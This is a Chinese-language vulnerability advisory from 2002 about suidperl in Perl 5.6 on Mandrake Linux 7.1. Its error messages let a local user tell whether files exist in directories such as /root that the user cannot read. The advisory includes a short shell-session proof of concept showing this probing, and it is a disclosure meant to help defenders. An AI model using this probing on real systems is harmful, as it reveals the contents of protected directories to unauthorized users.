发布日期：2002-11-30
更新日期：2002-12-05

受影响系统：

Larry Wall Perl 5.6
    - Mandrake Linux 7.1

描述：

---

BUGTRAQ  ID: 6282

SuidPerl是由Perl 5.x附带的程序。

SuidPerl存在访问验证漏洞，本地攻击者可以利用这个漏洞判断不能访问目录中的文件是否存在。

攻击者利用这个漏洞，通过使用原本不能访问的绝对路径文件名来调用suidperl，根据返回的信息不同，攻击者可以判断目录中是否存在这个文件，导致信息泄露。

<*来源：zen-parse
  *>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

zen-parse 提供了如下测试方法：

bash-2.04$ ls -ald /root
drwxr-x--- 66 root root 8192 Nov 29 16:00 /root
bash-2.04$ id
uid=500(evil) gid=500(evil) groups=500(evil)
bash-2.04$ ls /root/.bashrc
ls: /root/.bashrc: Permission denied
bash-2.04$ suidperl /root/.bashrc
Script is not setuid/setgid in suidperl
bash-2.04$ suidperl /root/nonexistantfile
Can't open perl script "/root/nonexistantfile": No such file or directory

建议：

---

厂商补丁：

Larry Wall
----------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.perl.org/

浏览次数：2832
严重程度：0（网友投票）